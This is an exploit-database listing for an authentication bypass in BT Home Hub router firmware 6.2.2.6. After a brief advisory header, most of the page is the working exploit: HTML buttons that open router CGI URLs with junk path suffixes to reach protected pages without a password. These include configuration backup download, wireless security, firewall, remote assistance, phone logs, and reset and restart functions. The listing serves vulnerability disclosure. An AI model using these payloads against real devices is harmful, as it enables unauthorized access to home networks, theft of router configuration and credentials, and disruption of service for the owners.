BT Home Hub Authentication Bypass Vulnerability

vendor:

Home Hub

by:

7.5

CVSS

HIGH

Authentication Bypass

CWE

Product Name: Home Hub

Affected Version From: 6.2.2.6

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

BT Home Hub Authentication Bypass Vulnerability

An attacker could exploit this issue to gain unauthorized access to the affected device. This exploit allows you to access most pages on a BTHomeHub Router, without needing to know the password.

Mitigation:

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26333/info

BT Home Hub is prone to an authentication-bypass vulnerability.

An attacker could exploit this issue to gain unauthorized access to the affected device.

BT Home Hub firmware 6.2.2.6 is vulnerable; other versions may also be affected. 

This exploit allows you to access most pages on a BTHomeHub Router, without needing to know the password. It has been tested to work with firmware version 6.2.2.6.

<form>
<input type="button" value="Download Current Router Configuration"
onclick="window.open('http://bthomehub.home/cgi/b/backup/user.ini/bthomehub-config')">
</form>

<form>
<input type="button" value="Wireless Configuration Page"
onclick="window.open('http://bthomehub.home/cgi/b/_wli_/cfg/djfkhfd')">
</form>

<form>
<input type="button" value="Wireless Security Configuration Page"
onclick="window.open('http://bthomehub.home/cgi/b/_wli_/seccfg/dbddfbdb')">
</form>

<form>
<input type="button" value="Wireless Repeater Configuation Page"
onclick="window.open('http://bthomehub.home/cgi/b/_wds_/cfg/fjfgfgh')">
</form>

<form>
<input type="button" value="Telephony Configuration Page"
onclick="window.open('http://bthomehub.home/cgi/b/_voip_/cfg/fhfjhgg')">
</form>
<form>
<input type="button" value="IP Addresses Configuration Page"
onclick="window.open('http://bthomehub.home/cgi/b/intfs/_intf_/cfg/dgdgdg')">
</form>

<form>
<input type="button" value="Devices Configuration Page"
onclick="window.open('http://bthomehub.home/cgi/b/devs/cfg/fefefef')">
</form>

<form>
<input type="button" value="Firewall Configuration Page"
onclick="window.open('http://bthomehub.home/cgi/b/secpol/cfg/fjfjhfj')">
</form>

<form>
<input type="button" value="Reset Router"
onclick="window.open('http://bthomehub.home/cgi/b/info/reset/gegegee')">
</form>

<form>
<input type="button" value="Restart Router"
onclick="window.open('http://bthomehub.home/cgi/b/info/restart/fhfjhgg')">
</form>

<form>
<input type="button" value="Remote Assistance Configuration Page"
onclick="window.open('http://bthomehub.home/cgi/b/ras/fjgfgfgh')">
</form>

<form>
<input type="button" value="Backup and Restore Configuration Page"
onclick="window.open('http://bthomehub.home/cgi/b/bandr/fjgfgfgh')">
</form>

<form>
<input type="button" value="Home Network Page"
onclick="window.open('http://bthomehub.home/cgi/b/lan/fjgfgfgh')">
</form>

<form>
<input type="button" value="Phone Logs Page"
onclick="window.open('http://bthomehub.home/cgi/b/_voip_/stats/dhjfhdfjh')">
</form>